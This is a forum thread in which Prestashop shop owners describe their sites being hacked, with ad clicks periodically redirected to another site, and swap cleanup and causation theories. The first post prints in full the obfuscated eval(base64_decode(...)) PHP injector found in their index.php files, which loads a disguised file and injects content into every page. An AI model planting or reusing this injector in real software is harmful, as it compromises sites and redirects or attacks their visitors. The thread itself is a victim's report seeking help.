Security attack by Ferdax.com

[yebberdog]

I have just been made aware that my Prestashop installation was compromised and hacked one day after installation back in October 2009. It has just come to light because we noticed that the click through on our Adwords account did not match the states on the site. When we clicked on a typical ad for our site we were redirected to a site call fardex.com and then to a separate search site. This was only periodically and not everytime you clicked the ad, also the same was hapening on general search links. What brought me to believe it was an attackon my site was that the actual link data passed by Google was the same regardless of whether it redireted to Ferdax.com.

After hours of searching and undertaking virus and malware checks on my site, I noticed that the majority of index.php files throughout the site have become corrupted with the following code:

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb29sdHJvbi9wdWJsaWNfaHRtbC9wcm9tb3Rlay5jby51ay96ZW5jYXJ0L2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2h0bWxfaW5jbHVkZXMvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2Nvb2x0cm9uL3B1YmxpY19odG1sL3Byb21vdGVrLmNvLnVrL3plbmNhcnQvaW5jbHVkZXMvbGFuZ3VhZ2VzL2VuZ2xpc2gvaHRtbF9pbmNsdWRlcy9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>


I am no expert but there seems to have been a similar problem with ZenCart which has been highlighted in the forums and I have no idea what the above means and how my site was hacked, however I would raise this as something that needs to be investigated.

At the moment I have simply gone through the whole site and removed this from all index.php files, it was quite easy to find them as the modification date was different by one day and it only related to the index.php files.

Look forward to any comments regarding this. By the way I am using Prestashop Verions 1.2.4.0.

Hi there!
I also got this on all my sites some days ago. Took time to clean, use a search and replace program for all files.

Its "gifimg.php" search on google and you will find more info.

What i think it really is, is that a malware on your computer has taken your credentials maybe so check for rootkit virus, and update adobe reader and flash player. (early version is easy to hijack apparently).

Hi Tobias

Thanks for your reply

After a lot of research I think you are right. I managed to get my server provider to run a find and replace on all files and then I undertook a virus scan through cpanel and found a virus. Also undertook further security measure as outlined through my research on the web and the problem seems to have been rectified and all is working normally. Also make sure a full virus scan is undertaken on your local computer as the same virus pulls ftp infomation from your computer.

This virus also attacks any php files but in the main index.php and also implants files in the image directory discuised at images.

Regards

Hi again.

Sounds good that it worked out for you.

Although im not that lucky myself :/ i got it back just now again after "thinking" im clean a couple of days.

You wrote you took: "Also undertook further security measure as outlined through my research on the web and the problem seems to have been rectified and all is working normally."

Please do write/pm more information on how what you did would be great to find out. How do you mean you did a virus scan through cpanel on the service provider? You mean that the service provider can have the virus? (the service provider im using says im the only one affected atm by this).

What kind of virus did you have on your computer and with what program did you remove it?

Appreciate all help :)

Hi
There is a code to clean all files here: http://www.prestasho..._et_repiratage/